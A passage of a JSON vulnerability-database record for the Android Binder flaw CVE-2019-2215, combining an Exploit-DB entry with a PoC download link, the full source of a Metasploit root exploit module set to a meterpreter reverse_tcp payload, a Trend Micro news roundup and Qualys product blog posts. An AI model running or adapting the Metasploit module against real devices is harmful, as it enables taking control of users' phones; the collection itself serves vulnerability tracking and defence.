(google/walleye/walleye:10/QP1A.190711.020/5800535:user/release-keys).\r\n\r\n\r\nVendor statement from Android:\r\n\r\n\"This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit. We have notified Android partners and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.\"\r\n\r\n\r\nProof of Concept:\r\nhttps://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47463.zip", "sourceHref": "https://www.exploit-db.com/raw/47463", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-06T13:18:47", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "exploitdb", "title": "Android Binder - Use-After-Free (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-2215", "CVE-2019-2215"], "modified": "2020-02-24T00:00:00", "id": "EDB-ID:48129", "href": "https://www.exploit-db.com/exploits/48129", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Common\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super( update_info( info, {\r\n 'Name' => \"Android Binder Use-After-Free Exploit\",\r\n 'Description' => %q{\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Jann Horn', # discovery and exploit\r\n 'Maddie Stone', # discovery and exploit\r\n 'grant-h', # Qu1ckR00t\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n [ 'CVE', '2019-2215' ],\r\n [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],\r\n [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],\r\n [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],\r\n ],\r\n 'DisclosureDate' => \"Sep 26 2019\",\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Platform' => [ \"android\", \"linux\" ],\r\n 'Arch' => [ ARCH_AARCH64 ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',\r\n 'WfsDelay' => 5,\r\n },\r\n 'DefaultTarget' => 0,\r\n }\r\n ))\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n write_file path, data\r\n chmod(path)\r\n register_file_for_cleanup(path)\r\n end\r\n\r\n def exploit\r\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2019-2215\", \"exploit\" )\r\n exploit_data = File.read(local_file, {:mode => 'rb'})\r\n\r\n workingdir = session.fs.dir.getwd\r\n exploit_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n upload_and_chmodx(exploit_file, exploit_data)\r\n payload_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\"\r\n upload_and_chmodx(payload_file, generate_payload_exe)\r\n\r\n print_status(\"Executing exploit '#{exploit_file}'\")\r\n result = cmd_exec(\"echo '#{payload_file} &' | #{exploit_file}\")\r\n print_status(\"Exploit result:\\n#{result}\")\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/raw/48129", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2020-02-14T11:32:31", "description": "![week in security](https://blog.trendmicro.com/wp-content/uploads/2018/02/Week-in-Security-News-Logo_RGB-300x300.jpg)\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how Trend Micro\u2019s collaboration with INTERPOL\u2019s Global Complex for Innovation helped reduce cryptojacking by 78% in Southeast Asia. Also, read about three malicious apps in the Google Play Store that may be linked to the SideWinder threat group.\n\nRead on:\n\n[**First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group**](<https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/>)\n\n_Trend Micro found three malicious apps in the Google Play Store that work together to compromise a device and collect user information. The three malicious apps -- disguised as photography and file manager tools -- are likely to be connected to SideWinder, a known threat group that has _[_reportedly targeted military entities\u2019 Windows machines_](<https://securelist.com/apt-trends-report-q1-2018/85280/>)_._\n\n[**Operation Goldfish Alpha Reduces Cryptojacking Across Southeast Asia by 78%**](<https://www.zdnet.com/article/operation-goldfish-alpha-reduces-cryptojacking-across-southeast-asia-by-78/>)\n\n_Interpol announced the results of Operation Goldfish Alpha, a six-month effort to secure hacked routers across the Southeast Asia region. The international law enforcement agency said its efforts resulted in a drop of cryptojacking operations across Southeast Asia by 78%, compared to levels recorded in June 2019. Private sector partners included the Cyber Defense Institute and Trend Micro. _\n\n[**Celebrating Decades of Success with Microsoft at the Security 20/20 Awards**](<https://blog.trendmicro.com/celebrating-decades-of-success-with-microsoft-at-the-security-20-20-awards/>)\n\n_Trend Micro, having worked closely with Microsoft for decades, is honored to be nominated for the Microsoft Security 20/20 Partner awards in the Customer Impact and Industry Changemaker categories. Check out this blog for more information on the inaugural awards and Trend Micro\u2019s recognitions._\n\n[**Security Predictions for 2020 According to Trend Micro**](<http://www.digitaljournal.com/tech-and-science/technology/security-predictions-for-2020-according-to-trend-micro/article/564720>)\n\n_Threat actors are shifting and adapting in their choice of attack vectors and tactics \u2014 prompting the need for businesses and users to stay ahead of the curve. Trend Micro has identified four key themes that will define 2020: a future that is set to be Complex, Exposed, Misconfigured and Defensible. Check out Digital Journal\u2019s Q&A with Greg Young, vice president of cybersecurity at Trend Micro, to learn more about security expectations for this year._\n\n[**The Everyday Cyber Threat Landscape: Trends from 2019 to 2020**](<https://blog.trendmicro.com/the-everyday-cyber-threat-landscape-trends-from-2019-to-2020/>)\n\n_In addition to security predictions for the new year, Trend Micro has listed some of the biggest threats from 2019 as well as some trends to keep an eye on as we begin 2020 in this blog. Many of the most dangerous attacks will look a lot like the ones Trend Micro warned about in 2019. _\n\n[**5 Key Security Lessons from the Cloud Hopper Mega Hack**](<https://www.forbes.com/sites/martingiles/2020/01/03/cloud-computing-security-cloud-hopper/?ss=cio-network#6b901af74552>)\n\n_In December 2019, the U.S. government issued indictments against two Chinese hackers who were allegedly involved in a multi-year effort to penetrate the systems of companies managing data and applications for customers via the computing cloud. The men, who remain at large, are thought to be part of a Chinese hacking collective known as APT10._\n\n[**The Summit of Cybersecurity Sits Among the Clouds**](<https://blog.trendmicro.com/the-summit-of-cybersecurity-sits-among-the-clouds/>)\n\n_Shifts in threats in the security landscape have led Trend Micro to develop Trend Micro Apex One![\u2122](https://s.w.org/images/core/emoji/12.0.0-1/72x72/2122.png), a newly redesigned endpoint protection solution. Trend Micro Apex One![\u2122](https://s.w.org/images/core/emoji/12.0.0-1/72x72/2122.png) brings enhanced fileless attack detection and advanced behavioral analysis and combines Trend Micro\u2019s powerful endpoint threat detection capabilities with endpoint detection and response (EDR) investigative capabilities._\n\n[**New Iranian Data Wiper Malware Hits Bapco, Bahrain\u2019s National Oil Company**](<https://www.zdnet.com/article/new-iranian-data-wiper-malware-hits-bapco-bahrains-national-oil-company/>)\n\n_Iranian state-sponsored hackers have deployed a new strain of data-wiping malware on the network of Bapco, Bahrain's national oil company. The incident took place on December 29th and didn\u2019t have the long-lasting effect hackers might have wanted, as only a portion of Bapco's computer fleet was impacted and the company continued to operate after the malware's detonation.__ _\n\n[**Ransomware Recap: Clop, DeathRansom, and Maze Ransomware**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-clop-deathransom-and-maze-ransomware>)\n\n_As the new year rolls in, new developments in different ransomware strains have emerged. For example, Clop ransomware has evolved to integrate a process killer that targets Windows 10 apps and various applications; DeathRansom can now encrypt files; and Maze ransomware has been targeting U.S. companies for stealing and encrypting data, alerted by the Federal Bureau of Investigation (FBI)._\n\n[**4 Ring Employees Fired for Spying on Customers**](<https://threatpost.com/four-ring-employees-fired-spying/151689/>)\n\n_Smart doorbell company Ring said that it has fired four employees over the past four years for inappropriately accessing customer video footage. The disclosure comes in a recent letter to senators from Amazon-owned Ring as it attempts to defend the privacy of its platform, which has been plagued by data privacy incidents over the past year._\n\n[**Web Skimming Attack on Blue Bear Affects School Admin Software Users**](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/web-skimming-attack-on-blue-bear-affects-school-admin-software-users>)\n\n_A web skimming attack was recently used to target Blue Bear, a school administration software that handles school accounting, student fees, and online stores for educational institutions.__ Names, credit card or debit card numbers, expiration dates and security codes, and Blue Bear account usernames and passwords may have been collected._\n\n[**Patched Microsoft Access \u2018MDB Leaker\u2019 (CVE-2019-1463) Exposes Sensitive Data in Database Files**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/patched-microsoft-access-mdb-leaker-cve-2019-1463-exposes-sensitive-data-in-database-files>)\n\n_Researchers uncovered an information disclosure vulnerability (CVE-2019-1463) affecting Microsoft Access, which occurs when the software fails to properly handle objects in memory. The vulnerability, dubbed \u201cMDB Leaker\u201d by Mimecast Research Labs, resembles a patched information disclosure bug in Microsoft Office (CVE-2019-0560) found in January 2019._\n\n[**Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-miner-uses-hacking-tool-haiduc-and-app-hider-xhide-to-brute-force-machines-and-servers>)\n\n_A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used to host the command for downloading the main shell script. The miner, a multi-component threat, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials._\n\nWhat are your thoughts on the rise of cryptomining malware and cryptojacking tactics? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: INTERPOL Collaboration Reduces Cryptojacking by 78% and Three Malicious Apps Found on Google Play May be Linked to SideWinder APT Group](<https://blog.trendmicro.com/this-week-in-security-news-interpol-collaboration-reduces-cryptojacking-by-78-and-three-malicious-apps-found-on-google-play-may-be-linked-to-sidewinder-apt-group/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2020-01-10T13:37:59", "type": "trendmicroblog", "title": "This Week in Security News: INTERPOL Collaboration Reduces Cryptojacking by 78% and Three Malicious Apps Found on Google Play May be Linked to SideWinder APT Group", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0560", "CVE-2019-1463", "CVE-2019-2215"], "modified": "2020-01-10T13:37:59", "id": "TRENDMICROBLOG:39422CC894D802D7548B0FA2E924E41B", "href": "https://blog.trendmicro.com/this-week-in-security-news-interpol-collaboration-reduces-cryptojacking-by-78-and-three-malicious-apps-found-on-google-play-may-be-linked-to-sidewinder-apt-group/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-02-11T22:27:16", "description": "As mobile devices have become ubiquitous in almost every business process, whether in bank branches, manufacturing sites or retail stores, they are now hosting business applications and data that is subject to regulatory compliance and security. With access to critical corporate resources inside the corporate network, these mobile devices have become critical assets for the organization.\n\n### Mobile Attack Surface Challenges\n\nAlongside this trend, there has been a drastic rise in Android, iOS, and iPadOS vulnerabilities and an increased number of vulnerable apps distributed from authorized app stores. Through these vectors, mobile devices have become preferred targets for attackers to gain an entry point into corporate networks. Last year, for example, [900 million Apple iOS users were affected](<https://www.forbes.com/sites/gordonkelly/2020/05/13/apple-iphone-exploit-vulnerability-ios-13-mail-problem-update-iphone-11-pro-max-u-iphone-xs-max-xr-upgrade/?sh=45195bbc07b7>) by iOS mail app vulnerability CVE-2020-9819 and CVE-2020-9818 exploit. Zecops [demonstrated how to exploit](<https://blog.zecops.com/vulnerabilities/seeing-maildemons-technique-triggers-and-a-bounty/>) these vulnerabilities (MailDemon) by sending oversized email to victims\u2019 devices.\n\nIn another attack, Android mobile devices [were targeted](<https://www.zdnet.com/article/google-reveals-sophisticated-windows-android-hacking-operation/>) using the Google Chrome app vulnerability CVE-2020-6418, a type of bug that incorrectly implements relevant security checks. The attacker tricked victims into visiting a specially crafted web page that gave the attacker an initial foothold on the victim\u2019s device via their browser. The attacker then deployed OS-level vulnerability CVE-2019-2215 to gain privileged control of the victim\u2019s device including access to their data and the corporate network.\n\nIn both cases, the attacks were successful because the organizations were using a traditional vulnerability scanning approach for mobile devices. This approach fails to provide holistic security for mobile devices because it requires devices to connect to the VPN or the organization\u2019s network in order to be scanned for vulnerabilities or patched. Mobile Device Management (MDM) also fails in this case because its \u2018policy-based prevention\u2019 does not assess devices or the apps running on them for the latest vulnerabilities, and it lacks knowledge of the security posture of the device and does not provide flexible patching. \n\nOrganizations are looking for a solution which provides continuous visibility into mobile devices across the enterprise, continuous visibility into the vulnerability and misconfiguration posture of the device and apps, and a workflow for prioritized updates and patching.\n\n### Introducing Qualys VMDR for Mobile Devices\n\nBuilt on the FedRAMP-authorized [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>), [Qualys VMDR for Mobile Devices](<https://www.qualys.com/vmdr-mobile-devices>) extends vulnerability management, detection and response capabilities to mobile device platforms such as Android, iOS, and iPadOS. Qualys Cloud Agent for Android, iOS and iPadOS, available on Google Play Store and Apple App Store, provides continuous visibility, security and patch orchestration for your mobile platforms.\n\nTo learn more about this solution, watch the webinar on March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>).\n\n#### Continuous Visibility and Monitoring of Mobile Devices Connecting to Your Network\n\nKnowing your mobile devices and monitoring their connections to your corporate network is fundamental to their security. With cloud agents deployed on your mobile devices, you get real-time visibility of all the mobile devices across your enterprise, including critical hardware and software details like firmware, OS, and installed applications details, along with location and the network information.\n\nThis mobile device inventory comes as a part of [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/Inventory-Asset-Listing-page--1070x573.png)Gain in-depth visibility into mobile devices across your enterprise\n\n#### Real-Time Visibility into Vulnerabilities and Critical Device Settings\n\nWith best-in-class vulnerability assessment for Android, iOS and iPadOS devices, Qualys VMDR for Mobile Devices enables:\n\n * Device vulnerability and exploit assessment covering vulnerabilities from 2016 to the latest for Android, iOS, and iPadOS providing insights into vulnerable OS versions with CVE details and detection of jailbroken/rooted devices,\n * Detection of critical device settings such as encryption disabled, password removed/disabled, Bluetooth settings, etc.,\n * Assessment of app vulnerability detections covering vulnerabilities from 2016 to the latest such as Google Chrome browser vulnerabilities, along with the detection of potentially harmful apps, and\n * Insights into network vulnerabilities and detection of devices connected to insecure or open Wi-Fi networks.\n\nQualys VMDR helps expand your vulnerability management program with configuration assessment by continuously monitoring the critical mobile device configurations as recommended by [National Security Agency (NSA) best practices](<https://www.nsa.gov/What-We-Do/Cybersecurity/Telework-and-Mobile-Security-Guidance/>), such as Bluetooth status, location services, app trusted status, and more.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/Vulnerability-Listing-Page-1070x611.png)Real-time visibility into vulnerabilities ![](https://blog.qualys.com/wp-content/uploads/2021/02/Asset_settings_N-1070x677.png)Real-time visibility into critical settings\n\n#### Remote Response and Seamless Patch Orchestration\n\nTwo of the biggest response challenges in the mobile world are:\n\n * Performing remote actions when the mobile device is not on the VPN or network, i.e. when traditional vulnerability management approaches are not possible, and\n * Determining the appropriate mitigation action, which requires time-consuming research to map application updates to vulnerabilities and then either deploy those updates or uninstall the risky apps.\n\nQualys VMDR for Mobile Devices automatically and continuously correlates the vulnerabilities of Android apps available on Google Play Store with appropriate application updates, significantly decreasing your remediation response time. IT and remediation teams can schedule and deploy those patches from Google Play Store via seamless orchestration provided by VMDR or they can uninstall vulnerable apps.\n\nBased on the security posture of the device, security teams can take actions on all at-risk mobile devices simultaneously, even if the devices are not connected to the VPN or corporate network, leveraging over-the-air, out-of-the-box controls to reset in critical cases or lock devices, change passcodes, or even de-enroll the device.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/Jobs_listing-page-1070x713.png)Seamless patch orchestration with tracking patch status ![](https://blog.qualys.com/wp-content/uploads/2021/02/Apps_N-1070x629.png)Uninstall the vulnerable app ![](https://blog.qualys.com/wp-content/uploads/2021/02/Actions_N-1070x629.png)Perform remote actions on the vulnerable devices\n\n#### Vulnerability Posture of Mobile Devices AND Servers in a Single Pane of Glass\n\nOne of the key metrics for vulnerability risk management teams and management is visualization of vulnerability and security posture across hybrid environments, from datacenter servers to endpoints to mobile devices. With mobile data flowing to the Qualys Cloud Platform via VMDR for Mobile Devices, your vulnerability and security teams can continuously inventory all your assets, including mobile devices, in a consolidated manner and gain insights into the vulnerability and misconfiguration posture of your servers and mobile devices in a single pane of glass.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/GAI-Dashboard-1070x1544.png)Gain visibility into the security posture of different types of assets in a single pane of glass.\n\n### Visibility, Assessment, Correlation and Orchestration\n\nWith the growth of mobile devices, increasing attack surface and data exposure risks, security teams are looking for a solution which goes beyond traditional mobile vulnerability scanning tools. Qualys VMDR for Mobile Devices extends the power of vulnerability & patch management to Android, iOS and iPadOS devices for: \n\n * Compressive visibility into mobile devices, installed apps, and configurations, even if they are not on VPN or network,\n * Continuous vulnerability and end-of-life assessment of devices, OSs, and applications along with monitoring for potential harmful applications,\n * Automatic correlation of vulnerabilities with apps and Android patches, and\n * Orchestration of appropriate response actions such as deploying patches from Google Play Store or uninstalling vulnerable apps.\n\n### Learn More\n\n * Webinar March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>)\n * [Start your free trial](<https://www.qualys.com/try-vmdr-mobile-devices>)\n * [About VMDR for Mobile Devices](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices>)\n * [User guide](<https://www.qualys.com/docs/qualys-sem-user-guide.pdf>)\n * [Qualys extends the power of VMDR to Android and iOS/iPadOS mobile devices](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-vmdr-for-mobile-devices>)", "cvss3": {}, "published": "2021-02-10T21:17:00", "type": "qualysblog", "title": "Expand Your Vulnerability & Patch Management Program to Mobile Devices with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-6418", "CVE-2020-9818", "CVE-2020-9819"], "modified": "2021-02-10T21:17:00", "id": "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulne

Android Issues Patches for 4 New Zero-Day Bugs Exploited in the Wild

Description

Related